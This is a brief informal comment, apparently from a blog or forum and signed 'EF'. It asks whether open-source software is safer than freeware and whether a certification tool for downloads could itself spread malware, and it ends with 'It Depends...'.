Does this mean open-source software is better off, since we could see the code. But even if the code is provided, can all the end users understand whats on the code? Freeware could also be infected, since the code ain't open. The only solution that we could think of, is to certify all the software downloads before them getting downloaded. Which means, that someone would be or would have already written an application for that. But, would that application also be malicious, would that application also bring in malware? Who knows...

The answer always is "It Depends..."

- EF